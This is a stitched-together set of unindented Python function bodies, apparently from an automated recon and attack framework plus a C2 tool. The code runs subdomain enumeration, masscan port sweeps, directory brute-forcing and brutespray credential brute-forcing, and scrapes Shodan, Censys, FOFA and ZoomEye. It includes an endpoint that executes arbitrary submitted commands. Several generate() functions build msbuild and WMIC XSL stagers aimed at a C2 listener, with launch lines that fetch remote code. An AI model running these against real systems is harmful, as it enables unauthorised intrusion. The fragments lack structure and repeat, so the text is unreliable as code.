def observatory(self):
utils.print_good('Starting observatory')
if self.is_direct:
domain_file = self.is_direct
else:
if self.options['SPEED'] == 'quick':
utils.print_good('Skipping {0} in quick mode'.format(self.module_name))
return None
domain_file = utils.replace_argument(
self.options, '$WORKSPACE/subdomain/final-$OUTPUT.txt')
with open(domain_file, 'r') as d:
domains = d.read().splitlines()
if self.options['DEBUG'] == "True":
utils.print_info("Only get 30 target debug mode")
domains = domains[:10]
for part in list(utils.chunks(domains, 1)):
for domain in part:
cmd = 'observatory --rescan -q {0} --format=json -z --attempts 50 | tee $WORKSPACE/headers/details/{0}-observatory.json'.format(
domain.strip())
cmd = utils.replace_argument(self.options, cmd)
execute.send_cmd(self.options, cmd, '', '', self.module_name, nolog=True)
time.sleep(10)
utils.just_waiting(self.options, self.module_name, seconds=10, times=2)
return True
def brutespray(self):
utils.print_good('Starting brutespray')
cmd = 'python $PLUGINS_PATH/brutespray/brutespray.py --file $WORKSPACE/vulnscan/$TARGET-nmap.xml --threads 5 --hosts 5 -o $WORKSPACE/bruteforce/$OUTPUT/'
cmd = utils.replace_argument(self.options, cmd)
utils.print_info("Execute: {0} ".format(cmd))
execute.run(cmd)
utils.check_output(self.options, '$WORKSPACE/bruteforce/$OUTPUT/')
def __init__(self, options):
utils.print_banner("IP Discovery")
utils.make_directory(options['WORKSPACE'] + '/ipspace')
self.module_name = self.__class__.__name__
self.options = options
if utils.resume(self.options, self.module_name):
utils.print_info("It's already done. use '-f' options to force rerun the module")
return
slack.slack_noti('status', self.options, mess={
'title': "{0} | {1}".format(self.options['TARGET'], self.module_name),
'content': 'Start IP Discovery for {0}'.format(self.options['TARGET'])
})
self.initial()
utils.just_waiting(self.options, self.module_name)
try:
self.conclude()
except:
utils.print_bad("Something wrong with conclude for {0}".format(self.module_name))
slack.slack_noti('good', self.options, mess={
'title': "{0} | {1} ".format(self.options['TARGET'], self.module_name),
'content': 'Done IP Discovery for {0}'.format(self.options['TARGET'])
})
def dig_info(self):
utils.print_good('Starting basic Dig')
utils.make_directory(self.options['WORKSPACE'] + '/screenshot/digs')
final_subdomains = utils.replace_argument(self.options, '$WORKSPACE/subdomain/final-$OUTPUT.txt')
#run command directly instead of run it via module cause there're a lot of command to run
all_domains = utils.just_read(final_subdomains).splitlines()
if self.options['DEBUG'] == 'True':
all_domains = all_domains[:10]
custom_logs = {"module": self.module_name, "content": []}
for part in list(utils.chunks(all_domains, 5)):
for domain in part:
cmd = utils.replace_argument(
self.options, 'dig all {0} | tee $WORKSPACE/screenshot/digs/{0}.txt'.format(domain))
output_path = utils.replace_argument(self.options, 'tee $WORKSPACE/screenshot/digs/{0}.txt'.format(domain))
execute.send_cmd(self.options, cmd, '', '', self.module_name, True)
# time.sleep(0.5)
custom_logs['content'].append(
{"cmd": cmd, "std_path": '', "output_path": output_path, "status": "Done"})
#just wait couple seconds and continue but not completely stop the routine
time.sleep(5)
print(custom_logs)
#submit a log
utils.print_info('Update activities log')
utils.update_activities(self.options, str(custom_logs))
def __init__(self, options):
utils.print_banner("Port Scanning")
utils.make_directory(options['WORKSPACE'] + '/portscan')
utils.make_directory(options['WORKSPACE'] + '/subdomain')
self.module_name = self.__class__.__name__
self.options = options
if utils.resume(self.options, self.module_name):
utils.print_info(
"It's already done. use '-f' options to force rerun the module")
return
self.is_direct = utils.is_direct_mode(options, require_input=True)
slack.slack_noti('status', self.options, mess={
'title': "{0} | {1}".format(self.options['TARGET'], self.module_name),
'content': 'Start Port Scanning for {0}'.format(self.options['TARGET'])
})
self.initial()
utils.just_waiting(self.options, self.module_name, seconds=60)
# self.create_ip_result()
self.conclude()
slack.slack_noti('good', self.options, mess={
'title': "{0} | {1}".format(self.options['TARGET'], self.module_name),
'content': 'Start Port Scanning for {0}'.format(self.options['TARGET'])
})
def __init__(self, options):
utils.make_directory(options['WORKSPACE'] + '/bruteforce/')
self.options = options
if utils.resume(self.options, self.module_name):
utils.print_info("It's already done. use '-f' options to force rerun the module")
return
if self.options['SPEED'] == 'slow':
self.routine()
elif self.options['SPEED'] == 'quick':
utils.print_good("Skipping for quick speed")
def dirsearch(self):
utils.print_good('Starting dirsearch')
if self.is_direct:
domains = utils.just_read(self.is_direct).splitlines()
else:
#matching IP with subdomain
main_json = utils.reading_json(utils.replace_argument(
self.options, '$WORKSPACE/$COMPANY.json'))
domains = [x.get('Domain') for x in main_json['Subdomains']]
if self.options['DEBUG'] == 'True':
domains = domains[:5]
custom_logs = {"module": self.module_name, "content": []}
for part in utils.chunks(domains, 3):
for domain in part:
#just strip everything to save local, it won't affect the result
strip_domain = domain.replace(
'http://', '').replace('https://', '').replace('/', '-')
cmd = "python3 $PLUGINS_PATH/dirsearch/dirsearch.py -b -e php,zip,aspx,js --wordlist=$PLUGINS_PATH/wordlists/really-quick.txt --simple-report=$WORKSPACE/directory/quick/{1}-dirsearch.txt -t 50 -u {0}".format(
domain, strip_domain)
cmd = utils.replace_argument(self.options, cmd)
output_path = utils.replace_argument(
self.options, '$WORKSPACE/directory/quick/{0}-dirsearch.txt'.format(strip_domain))
std_path = utils.replace_argument(
self.options, '$WORKSPACE/directory/quick/std-{0}-dirsearch.std'.format(strip_domain))
execute.send_cmd(self.options, cmd, output_path,
std_path, self.module_name)
# time.sleep(0.5)
#set status to done because this gonna will be submit when all command was done
custom_logs['content'].append(
{"cmd": cmd, "std_path": std_path, "output_path": output_path, "status": "Done"})
#just wait couple seconds and continue but not completely stop the routine
time.sleep(20)
#submit a log
utils.print_info('Update activities log')
# utils.update_activities(self.options, str(custom_logs))
utils.force_done(self.options, self.module_name)
#just save commands
logfile = utils.replace_argument(self.options, '$WORKSPACE/log.json')
utils.save_all_cmd(self.options, logfile)
def __init__(self, options):
utils.print_banner("SSL Scanning")
utils.make_directory(options['WORKSPACE'] + '/ssl/')
self.module_name = self.__class__.__name__
self.options = options
if utils.resume(self.options, self.module_name):
utils.print_info("It's already done. use '-f' options to force rerun the module")
return
slack.slack_noti('status', self.options, mess={
'title': "{0} | {1}".format(self.options['TARGET'], self.module_name),
'content': 'Start SSL Scanning for {0}'.format(self.options['TARGET'])
})
self.initial()
utils.just_waiting(self.options, self.module_name)
def quick_gobuster(self):
utils.print_good('Starting gobuster for short wordlist')
if self.is_direct:
domains = utils.just_read(self.is_direct).splitlines()
else:
#matching IP with subdomain
main_json = utils.reading_json(utils.replace_argument(self.options, '$WORKSPACE/$COMPANY.json'))
domains = [x.get('Domain') for x in main_json['Subdomains']]
if self.options['DEBUG'] == 'True':
domains = domains[:5]
custom_logs = {"module": self.module_name, "content": []}
for part in utils.chunks(domains, 3):
for domain in part:
#just strip everything to save local, it won't affect the result
strip_domain = domain.replace(
'http://', '').replace('https://', '').replace('/', '-')
cmd = '$GO_PATH/gobuster -k -q -e -x php,jsp,aspx,html,json -w $PLUGINS_PATH/wordlists/quick-content-discovery.txt -t 100 -o $WORKSPACE/directory/{1}-gobuster.txt -s 200,301,307 -u "{0}" '.format(
domain.strip(), strip_domain)
cmd = utils.replace_argument(self.options, cmd)
output_path = utils.replace_argument(
self.options, '$WORKSPACE/directory/quick/{0}-gobuster.txt'.format(strip_domain))
std_path = utils.replace_argument(
self.options, '$WORKSPACE/directory/quick/std-{0}-gobuster.std'.format(strip_domain))
execute.send_cmd(self.options, cmd, output_path, std_path, self.module_name)
# time.sleep(0.5)
#set status to done because this gonna will be submit when all command was done
custom_logs['content'].append({"cmd": cmd, "std_path": std_path, "output_path": output_path, "status": "Done"})
#just wait couple seconds and continue but not completely stop the routine
time.sleep(20)
#submit a log
utils.print_info('Update activities log')
utils.force_done(self.options, self.module_name)
# utils.update_activities(self.options, str(custom_logs))
#just save commands
logfile = utils.replace_argument(self.options, '$WORKSPACE/log.json')
utils.save_all_cmd(self.options, logfile)
def normal(options):
utils.print_good("Running with {0} speed".format(options['SPEED']))
# Create skeleton json
initials.Initials(options)
##Finding subdomain
subdomain.SubdomainScanning(options)
##waiting for previous module
utils.just_waiting(options, 'SubdomainScanning')
# ##Scanning for subdomain take over
takeover.TakeOverScanning(options)
##Screen shot the target on common service
screenshot.ScreenShot(options)
##Recon
recon.Recon(options)
##Scanning for CorsScan
cors.CorsScan(options)
# ##Discovery IP space
ipspace.IPSpace(options)
# ##SSL Scan
sslscan.SSLScan(options)
# ##Headers Scan
headers.HeadersScan(options)
# ##### Note: From here the module gonna take really long time for scanning service and stuff like that
utils.print_info('This gonna take a while')
# #Scanning all port using result from subdomain scanning and also checking vulnerable service based on version
portscan.PortScan(options)
#Directory scan
dirbrute.DirBrute(options)
# #Starting vulnerable scan
vulnscan.VulnScan(options)
# brutethings.BruteThings(options)
conclusion.Conclusion(options)
def generate(self, listener, filename=None, as_string=False):
stager_filename = filename if filename else 'msbuild.xml'
with open('stagers/templates/msbuild.xml') as template:
template = template.read()
template = template.replace('C2_URL', f"{listener.name}://{listener['BindIP']}:{listener['Port']}")
if not as_string:
with open(stager_filename, 'w') as stager:
stager.write(template)
print_good(f"Generated stager to {stager.name}")
print_info(
f"Launch with 'C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\msbuild.exe {stager_filename}'")
else:
return template
def __init__(self, options):
utils.print_banner("ScreenShot the target")
utils.make_directory(options['WORKSPACE'] + '/screenshot')
self.module_name = self.__class__.__name__
self.options = options
if utils.resume(self.options, self.module_name):
utils.print_info("It's already done. use '-f' options to force rerun the module")
return
slack.slack_noti('status', self.options, mess={
'title': "{0} | {1}".format(self.options['TARGET'], self.module_name),
'content': 'Start ScreenShot for {0}'.format(self.options['TARGET'])
})
self.initial()
slack.slack_noti('good', self.options, mess={
'title': "{0} | {1} ".format(self.options['TARGET'], self.module_name),
'content': 'Done ScreenShot for {0}'.format(self.options['TARGET'])
})
def custom_help():
utils.print_info("Visit this page for complete usage: https://github.com/j3ssie/Osmedeus/wiki")
print('''{1}
{2}Basic Usage{1}
===========
python3 osmedeus.py -t <your_target>
python3 osmedeus.py -T <list_of_targets>
{2}Advanced Usage{1}
==============
{0}[*] List all module{1}
python3 osmedeus.py -M
{0}[*] Running with specific module{1}
python3 osmedeus.py -t <result_folder> -m <module_name> -i <your_target>
{0}[*] Example command{1}
python3 osmedeus.py -t sample2 -m vuln -i hosts.txt
python3 osmedeus.py -t sample2 -m dirb -i /tmp/list_of_hosts.txt
{2}Remote Options{1}
==============
--remote REMOTE Remote address for API, (default: https://127.0.0.1:5000)
--auth AUTH Specify auth tication e.g: --auth="username:password"
See your config file for more detail (default: {2}core/config.conf{1})
--client just run client stuff in case you ran the flask server before
{2}More options{1}
==============
--update Update lastest from git
-c CONFIG, --config CONFIG
Specify config file (default: {2}core/config.conf{1})
-w WORKSPACE, --workspace WORKSPACE
Custom workspace folder
-f, --force force to run the module again if output exists
-v, --verbose show verbose output
-q, --quick run this tool with quick routine
-s, --slow run this tool with slow routine
--debug Just for debug purpose
'''.format(G, GR, B))
sys.exit(0)
def masscan(self):
utils.print_good('Starting masscan')
time.sleep(1)
main_json = utils.reading_json(
utils.replace_argument(self.options, '$WORKSPACE/$COMPANY.json'))
main_json['Modules'][self.module_name] = []
if self.options['SPEED'] == 'slow':
ip_list = [
x.get("IP")
for x in main_json['Subdomains'] if x.get("IP") is not None
] + main_json['IP Space']
elif self.options['SPEED'] == 'quick':
ip_list = [
x.get("IP") for x in main_json['Subdomains']
if x.get("IP") is not None
]
ip_list = set([ip for ip in ip_list if ip != 'N/A'])
if self.options['DEBUG'] == "True":
utils.print_info("just testing 5 first host")
ip_list = list(ip_list)[:5]
# print(ip_list)
utils.just_write(
utils.replace_argument(self.options,
'$WORKSPACE/subdomain/IP-$TARGET.txt'),
"\n".join(ip_list))
# print(ip_list)
time.sleep(1)
# cmd = "sudo masscan --rate 10000 -p0-65535 -iL $WORKSPACE/subdomain/IP-$TARGET.txt -oJ $WORKSPACE/portscan/$OUTPUT-masscan.json --wait 0"
cmd = "sudo masscan --rate 1000 -p0-65535 -iL $WORKSPACE/subdomain/IP-$TARGET.txt -oX $WORKSPACE/portscan/$OUTPUT-masscan.xml --wait 0"
cmd = utils.replace_argument(self.options, cmd)
output_path = utils.replace_argument(
self.options, '$WORKSPACE/portscan/$OUTPUT-masscan.xml')
std_path = utils.replace_argument(
self.options, '$WORKSPACE/portscan/std-$OUTPUT-masscan.std')
execute.send_cmd(cmd, output_path, std_path, self.module_name)
def get_asn(self):
ip_target = utils.resolve_input(self.target)
if not ip_target:
return False
utils.print_banner(f"Starting scraping detail ASN of {ip_target}")
utils.print_info(f'Get ASN from IP: {ip_target}')
url = f'https://ipinfo.io/{ip_target}/json'
r = sender.send_get(self.options, url, None)
org_info = r.json().get('org')
asn = utils.get_asn(org_info)
if asn:
utils.print_info(f"Detect target running on {asn}")
ips = self.get_asn_ip(asn)
utils.just_write(self.options['output'], "\n".join(ips))
utils.just_cleanup(self.options['output'])
else:
return False
def massdns(self):
utils.print_good('Starting massdns')
cmd = '$PLUGINS_PATH/massdns/scripts/subbrute.py $DOMAIN_FULL $TARGET | $PLUGINS_PATH/massdns/bin/massdns -r $PLUGINS_PATH/massdns/lists/resolvers.txt -t A -o S -w $WORKSPACE/subdomain/raw-massdns.txt'
# cmd = '$PLUGINS_PATH/massdns/scripts/subbrute.py $PLUGINS_PATH/massdns/lists/names.txt $TARGET | $PLUGINS_PATH/massdns/bin/massdns -r $PLUGINS_PATH/massdns/lists/resolvers.txt -t A -o S -w $WORKSPACE/subdomain/$OUTPUT-massdns.txt'
cmd = utils.replace_argument(self.options, cmd)
utils.print_info("Execute: {0} ".format(cmd))
execute.run(cmd)
massdns_raw = utils.replace_argument(self.options, '$WORKSPACE/subdomain/raw-massdns.txt')
massdns_output = utils.replace_argument(self.options, '$WORKSPACE/subdomain/$OUTPUT-massdns.txt')
with open(massdns_raw, 'r+') as d:
ds = d.read().splitlines()
for line in ds:
newline = line.split(' ')[0][:-1]
with open(massdns_output, 'a+') as m:
m.write(newline + "\n")
utils.check_output(self.options, '$WORKSPACE/subdomain/$OUTPUT-massdns.txt')
def generate(self, listener):
with open('wmic.xsl', 'w') as stager:
with open('stagers/templates/wmic.xsl') as template:
template = template.read()
template = template.replace(
'C2_URL',
f"https://{listener['BindIP']}:{listener['Port']}")
template = template.replace('C2_CHANNEL', f"{listener.name}")
stager.write(template)
print_good(f"Generated stager to {stager.name}")
print_info("Launch with:")
print(
'\tC:\\Windows\\System32\\wbem\\WMIC.exe os get /format:"https://myurl/wmic.xsl"'
)
print(
'\tC:\\Windows\\System32\\wbem\\WMIC.exe os get /format:"wmic.xsl"'
)
def single_query(options):
utils.print_debug(options, options)
utils.print_info("Query: {0}".format(options.get('query')))
if not options.get('source'):
utils.print_bad("You need to specify Search engine")
return
if 'fofa' in options.get('source'):
fofa.Fofa(options)
if 'shodan' in options.get('source'):
shodan.Shodan(options)
if 'censys' in options.get('source'):
censys.Censys(options)
if 'zoom' in options.get('source'):
zoomeye.ZoomEye(options)
def initial(self):
# prepare url
query = utils.url_encode(self.options['shodan_query'])
url = 'https://www.shodan.io/search?query={1}&page={0}'.format(str(1), query)
self.sending(url)
# brute the country
if self.options['brute']:
self.brute_country_code(query)
# repeat the routine with filter by city
query_by_cities = self.optimize(query)
if query_by_cities:
for item in query_by_cities:
utils.print_info(
"Get more result by filter with {0} city".format(item.get('city')))
self.sending(item.get('url'))
def normal(options):
utils.print_good("Running with {0} speed".format(options['SPEED']))
# Create skeleton json
initials.Initials(options)
##Finding subdomain
subdomain.SubdomainScanning(options)
##waiting for previous module
utils.just_waiting('SubdomainScanning')
# ##Scanning for subdomain take over
takeover.TakeOverScanning(options)
##Screen shot the target on common service
screenshot.ScreenShot(options)
##Scanning for CorsScan
cors.CorsScan(options)
# ##Discovery IP space
ipspace.IPSpace(options)
# ##SSL Scan
sslscan.SSLScan(options)
# ##Headers Scan
headers.HeadersScan(options)
# ##### Note: From here the module gonna take really long time for scanning service and stuff like that
utils.print_info('This gonna take a while')
# #Scanning all port using result from subdomain scanning and also checking vulnerable service based on version
portscan.PortScan(options)
# #Starting vulnerable scan
vulnscan.VulnScan(options)
# #Brute force service from port scan result
# brutethings.BruteThings(options)
conclusion.Conclusion(options)
def post(self, request, *args, **kwargs):
serializer = ExecuteSerializer(data=request.data)
serializer.is_valid(raise_exception=True)
data = serializer.data
forced = data.get('forced')
cmd = data.get('cmd')
output_path = data.get('output_path')
cmd_type = data.get('cmd_type')
# don't care about the status
nolog = data.get('nolog')
# forced check if output path exist
if not forced:
if utils.not_empty_file(output_path):
return common.message(500, "Commands is already done")
# set idle status
if nolog:
data['status'] = 'Done'
else:
data['status'] = 'Running'
item = parse_data(data)
instance = Activities.objects.create(**item)
Logs.objects.create(**item)
command_record = instance.as_json()
# really run the command
if cmd_type == 'single':
utils.print_info("Execute: {0} ".format(cmd))
execute.run_single(command_record)
elif cmd_type == 'list':
utils.print_info("Execute chunk: {0} ".format(cmd))
commands = execute.get_chunk_commands(command_record)
execute.run_chunk(commands, command_record.get(
'chunk'), command_record.get('delay'))
# update status after done
if instance.status != 'Done':
instance.status = 'Done'
instance.save()
return common.message(200, "Commands is done")
def permutation(self):
# running goaltdns
if self.options['SPEED'] == 'quick':
utils.print_info('Skip permutation subdomain for quick mode')
return None
elif self.options['SPEED'] == 'slow':
cmd = '$GO_PATH/goaltdns -w $PLUGINS_PATH/wordlists/short-permutation.txt -l $WORKSPACE/subdomain/full-$OUTPUT.txt -o $WORKSPACE/subdomain/permutation-$OUTPUT.txt'
cmd = utils.replace_argument(self.options, cmd)
output_path = utils.replace_argument(
self.options, '$WORKSPACE/subdomain/permutation-$OUTPUT.txt')
execute.send_cmd(self.options, cmd, output_path,
'', self.module_name)
utils.just_waiting(self.options, self.module_name, seconds=5)
# resolve generated domain to verify it
cmd2 = '$PLUGINS_PATH/massdns/bin/massdns -r $PLUGINS_PATH/massdns/lists/resolvers.txt --sticky -t A --verify-ip -q -o S -w $WORKSPACE/subdomain/massdns-permutation-$OUTPUT.txt $WORKSPACE/subdomain/permutation-$OUTPUT.txt'
cmd2 = utils.replace_argument(self.options, cmd2)
output_path2 = utils.replace_argument(
self.options, '$WORKSPACE/subdomain/massdns-IP-$OUTPUT.txt')
execute.send_cmd(self.options, cmd, output_path2, '', self.module_name)
utils.just_waiting(self.options, self.module_name, seconds=5)
# strip out some false positive cause some resolvers are crazy
raw_permutation = utils.just_read(output_path2)
permutation_domains = []
if raw_permutation:
# finding false positive
false_positive = []
tmp_false_positive = []
for line in raw_permutation.splitlines():
tmp_false_positive.append(line.split('. A')[1])
for item in tmp_false_positive:
if tmp_false_positive.count(item) > 3:
false_positive.append(item)
# really adding things
for line in raw_permutation.splitlines():
if line.split('. A ')[1] not in false_positive:
permutation_domains.append(
line.split('. A ')[0])
return permutation_domains
def masscan(self):
utils.print_good('Starting masscan')
time.sleep(1)
if self.is_direct:
ip_file = utils.replace_argument(
self.options, '$WORKSPACE/subdomain/final-IP-$OUTPUT.txt')
# print(ip_file)
# print(utils.just_read(ip_file))
ip_list = utils.just_read(ip_file).splitlines()
ip_list = list(set([ip for ip in ip_list if ip != 'N/A']))
else:
main_json = utils.reading_json(utils.replace_argument(
self.options, '$WORKSPACE/$COMPANY.json'))
main_json['Modules'][self.module_name] = []
if self.options['SPEED'] == 'slow':
ip_list = [x.get("IP")
for x in main_json['Subdomains'] if x.get("IP") is not None] + main_json['IP Space']
elif self.options['SPEED'] == 'quick':
ip_list = [x.get("IP")
for x in main_json['Subdomains'] if x.get("IP") is not None]
ip_list = set([ip for ip in ip_list if ip != 'N/A'])
if self.options['DEBUG'] == "True":
utils.print_info("just testing 5 first host")
ip_list = list(ip_list)[:5]
utils.just_write(utils.replace_argument(
self.options, '$WORKSPACE/subdomain/IP-$TARGET.txt'), "\n".join(ip_list))
# print(ip_list)
time.sleep(1)
cmd = "sudo masscan --rate 1000 -p0-65535 -iL $WORKSPACE/subdomain/IP-$TARGET.txt -oX $WORKSPACE/portscan/$OUTPUT-masscan.xml --wait 0"
cmd = utils.replace_argument(self.options, cmd)
output_path = utils.replace_argument(
self.options, '$WORKSPACE/portscan/$OUTPUT-masscan.xml')
std_path = utils.replace_argument(
self.options, '$WORKSPACE/portscan/std-$OUTPUT-masscan.std')
execute.send_cmd(self.options, cmd, output_path, std_path, self.module_name)
def __init__(self, options):
utils.print_banner("CORS Scanning")
utils.make_directory(options['WORKSPACE'] + '/cors')
self.module_name = self.__class__.__name__
self.options = options
if utils.resume(self.options, self.module_name):
utils.print_info("It's already done. use '-f' options to force rerun the module")
return
slack.slack_noti('status', self.options, mess={
'title': "{0} | {1}".format(self.options['TARGET'], self.module_name),
'content': 'Start Scanning CORS for {0}'.format(self.options['TARGET'])
})
self.initial()
utils.just_waiting(self.options, self.module_name)
slack.slack_noti('good', self.options, mess={
'title': "{0} | {1} ".format(self.options['TARGET'], self.module_name),
'content': 'Done Scanning CORS for {0}'.format(self.options['TARGET'])
})
utils.print_line()
def dirsearch(self):
utils.print_good('Starting dirsearch')
#matching IP with subdomain
main_json = utils.reading_json(
utils.replace_argument(self.options, '$WORKSPACE/$COMPANY.json'))
domains = [x.get('Domain') for x in main_json['Subdomains']]
if self.options['DEBUG'] == 'True':
domains = domains[:5]
custom_logs = {"module": self.module_name, "content": []}
for part in list(utils.chunks(domains, 2)):
for domain in part:
cmd = "python3 $PLUGINS_PATH/dirsearch/dirsearch.py --json-report=$WORKSPACE/directory/{0}-dirsearch.json -u '{0}' -e php,jsp,aspx,js,html -t 20 -b".format(
domain)
cmd = utils.replace_argument(self.options, cmd)
output_path = utils.replace_argument(
self.options,
'$WORKSPACE/directory/{0}-dirsearch.json'.format(domain))
std_path = utils.replace_argument(
self.options,
'$WORKSPACE/directory/std-{0}-dirsearch.std'.format(
domain))
execute.send_cmd(cmd, output_path, std_path, self.module_name,
True)
# time.sleep(0.5)
#set status to done because this gonna will be submit when all command was done
custom_logs['content'].append({
"cmd": cmd,
"std_path": std_path,
"output_path": output_path,
"status": "Done"
})
#just wait couple seconds and continue but not completely stop the routine
time.sleep(20)
#submit a log
utils.print_info('Update activities log')
utils.update_activities(str(custom_logs))
def do_login(self):
utils.print_info("Reauthen using credentials from: {0}".format(
self.options.get('config')))
login_url = 'https://censys.io/login'
r = sender.send_get(self.options, login_url, cookies=None)
if r.status_code == 200:
cookies = r.cookies
form = utils.soup(r.text).find_all("form")
if form:
inputs = form[0].findChildren('input')
for tag in inputs:
if tag.get('name') == 'csrf_token':
csrf_token = tag.get('value')
username, password = utils.get_cred(self.options, source='censys')
data = {
"csrf_token": csrf_token,
"came_from": "/",
"from_censys_owned_external": "False",
"login": username,
"password": password
}
really_login_url = 'https://censys.io/login'
r1 = sender.send_post(self.options,
really_login_url,
cookies,
data,
follow=False)
if r1.status_code == 302:
for item in r1.cookies.items():
if item.get('auth_tkt'):
censys_cookies = item.get('auth_tkt')
utils.set_session(self.options,
censys_cookies,
source='censys')
return censys_cookies
return False
def pages(self, page_num):
for i in range(2, int(page_num) + 1):
utils.print_info("Get more result from page: {0}".format(str(i)))
utils.random_sleep(1, 2)
query = utils.url_encode(self.options['censys_query'])
url = 'https://censys.io/ipv4/_search?q={1}&page={0}'.format(
str(i), query)
r = sender.send_get(self.options, url, self.cookies)
if r.status_code == 200:
response = r.text
if 'class="alert alert-danger"' in response:
utils.print_bad("Reach to the limit at page {0}".format(
str(i)))
return
else:
soup = utils.soup(response)
self.analyze(soup)
def __init__(self, options):
utils.print_banner("Scanning for Subdomain TakeOver")
self.module_name = self.__class__.__name__
self.options = options
if utils.resume(self.options, self.module_name):
utils.print_info("It's already done. use '-f' options to force rerun the module")
return
slack.slack_noti('status', self.options, mess={
'title': "{0} | {1}".format(self.options['TARGET'], self.module_name),
'content': 'Start Scanning TakeOver for {0}'.format(self.options['TARGET'])
})
self.initial()
slack.slack_noti('good', self.options, mess={
'title': "{0} | {1} ".format(self.options['TARGET'], self.module_name),
'content': 'Done Scanning TakeOver for {0}'.format(self.options['TARGET'])
})
utils.print_banner("{0} Done".format(self.module_name))
def default_config(config_path=None):
if not config_path:
config_path = str(Path.home().joinpath('.osmedeus/config.conf'))
utils.print_info("Detect config at: {0}".format(config_path))
core_config = ConfigParser(interpolation=ExtendedInterpolation())
core_config.read(config_path)
sections = core_config.sections()
options = {
'CONFIG_PATH': os.path.abspath(config_path),
}
for sec in sections:
for key in core_config[sec]:
options[key.upper()] = core_config.get(sec, key)
utils.print_info("Clean config.conf file")
os.remove(config_path)
return options
def sending(self, url):
# sending request and return the response
r = sender.send_get(self.options, url, self.cookies)
if r:
response = r.text
if self.options['store_content']:
ts = str(int(time.time()))
raw_file = self.options['raw'] + \
"/shodan/{0}_{1}".format(utils.url_encode(
url.replace(self.base_url, '')).replace('/', '_'), ts)
utils.just_write(raw_file, response)
soup = utils.soup(response)
self.analyze(soup)
# checking if there is many pages or not
if self.logged_in and not self.options['disable_pages']:
utils.print_info("Continue grab more pages")
self.pages(self.get_num_pages(url))
def generate(self, listener, filename=None, as_string=False):
stager_filename = filename if filename else 'msbuild.xml'
with open('stagers/templates/msbuild.xml') as template:
template = template.read()
template = template.replace(
'C2_URL',
f"{listener.name}://{listener['BindIP']}:{listener['Port']}")
if not as_string:
with open(stager_filename, 'w') as stager:
stager.write(template)
print_good(f"Generated stager to {stager.name}")
print_info(
f"Launch with 'C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\msbuild.exe {stager_filename}'"
)
else:
return template
def do_login(self):
utils.print_info("Reauthen using credentials from: {0}".format(
self.options.get('config')))
login_url = 'https://i.nosec.org/login?service=http%3A%2F%2Ffofa.so%2Fusers%2Fservice'
r = sender.send_get(self.options, login_url, cookies=None)
if r.status_code == 200:
cookies = r.cookies
form = utils.soup(r.text).find(id="login-form")
inputs = form.findChildren('input')
for tag in inputs:
if tag.get('name') == 'authenticity_token':
authenticity_token = tag.get('value')
if tag.get('name') == 'lt':
lt = tag.get('value')
if tag.get('name') == 'authenticity_token':
authenticity_token = tag.get('value')
username, password = utils.get_cred(self.options, source='fofa')
data = {
"utf8": "\xe2\x9c\x93",
"authenticity_token": authenticity_token,
"lt": lt,
"service": "http://fofa.so/users/service",
"username": username,
"password": password,
"rememberMe": "1",
"button": ''
}
really_login_url = 'https://i.nosec.org/login'
r1 = sender.send_post(self.options, really_login_url, cookies,
data)
if r1.status_code == 200:
fofa_cookie = r1.cookies.get('_fofapro_ars_session')
utils.set_session(self.options, fofa_cookie, source='fofa')
return fofa_cookie
return False
def debug(options):
utils.print_good("Debug routine")
utils.print_good("Running with {0} speed".format(options['SPEED']))
# Create skeleton json
pprint(options)
# initials.Initials(options)
###Finding subdomain
# subdomain.SubdomainScanning(options)
####waiting for previous module
# # utils.just_waiting('SubdomainScanning')
###Screen shot the target on common service
# screenshot.ScreenShot(options)
###Scanning for subdomain take over
# takeover.TakeOverScanning(options)
##Discovery IP space
# ipspace.IPSpace(options)
# # ##Scanning for CorsScan
# cors.CorsScan(options)
### SSL Scan
# sslscan.SSLScan(options)
##Headers Scan
# headers.HeadersScan(options)
##### Note: From here the module gonna take really long time for scanning service and stuff like that
utils.print_info('This gonna take a while')
# dirbrute.DirBrute(options)
#Scanning all port using result from subdomain scanning and also checking vulnerable service based on version
portscan.PortScan(options)
def pages(self, page_num):
for i in range(2, int(page_num) + 1):
utils.random_sleep(1, 2)
utils.print_info("Get more result from page: {0}".format(str(i)))
query = utils.url_encode(self.options['zoomeye_query'])
url = 'https://www.zoomeye.org/search?q={0}&t=host&p={1}'.format(
query, str(i))
r = sender.send_get(self.options, url, headers=self.headers)
if r.status_code == 200:
response = r.text
if '"msg": "forbidden"' in response:
utils.print_bad("Reach to the limit at page {0}".format(
str(i)))
return
else:
json_response = utils.get_json(response)
self.analyze(json_response)
self.optimize(json_response)
def __init__(self, options):
utils.print_banner("Scanning through BurpState")
utils.make_directory(options['WORKSPACE'] + '/burpstate/')
self.module_name = self.__class__.__name__
self.options = options
self.options['CURRENT_MODULE'] = self.module_name
self.options['SPEED'] = utils.custom_speed(self.options)
if utils.resume(self.options, self.module_name):
utils.print_info("It's already done. use '-f' options to force rerun the module")
return
slack.slack_noti('status', self.options, mess={
'title': "{0} | {1}".format(self.options['TARGET'], self.module_name),
'content': 'Start Scanning BurpState for {0}'.format(self.options['TARGET'])
})
self.initial()
slack.slack_noti('good', self.options, mess={
'title': "{0} | {1}".format(self.options['TARGET'], self.module_name),
'content': 'Start Scanning BurpState for {0}'.format(self.options['TARGET'])
})
self.conclude()
def pages(self, page_num):
for i in range(2, int(page_num) + 1):
utils.print_info("Get more result from page: {0}".format(str(i)))
query = utils.url_encode(
utils.just_b64_encode(self.options['fofa_query']))
url = 'https://fofa.so/result?page={0}&qbase64={1}'.format(
str(i), query)
utils.print_debug(self.options, url)
r = sender.send_get(self.options, url, self.cookies)
if r.status_code == 200:
response = r.text
if 'class="error"' in response:
utils.print_bad("Reach to the limit at page {0}".format(
str(i)))
return
else:
soup = utils.soup(response)
self.analyze(soup)
def dig_info(self):
utils.print_good('Starting basic Dig')
utils.make_directory(self.options['WORKSPACE'] + '/screenshot/digs')
final_subdomains = utils.replace_argument(
self.options, '$WORKSPACE/subdomain/final-$OUTPUT.txt')
#run command directly instead of run it via module cause there're a lot of command to run
all_domains = utils.just_read(final_subdomains).splitlines()
if self.options['DEBUG'] == 'True':
all_domains = all_domains[:10]
custom_logs = {"module": self.module_name, "content": []}
for part in list(utils.chunks(all_domains, 5)):
for domain in part:
cmd = utils.replace_argument(
self.options,
'dig all {0} | tee $WORKSPACE/screenshot/digs/{0}.txt'.
format(domain))
output_path = utils.replace_argument(
self.options,
'tee $WORKSPACE/screenshot/digs/{0}.txt'.format(domain))
execute.send_cmd(self.options, cmd, '', '', self.module_name,
True)
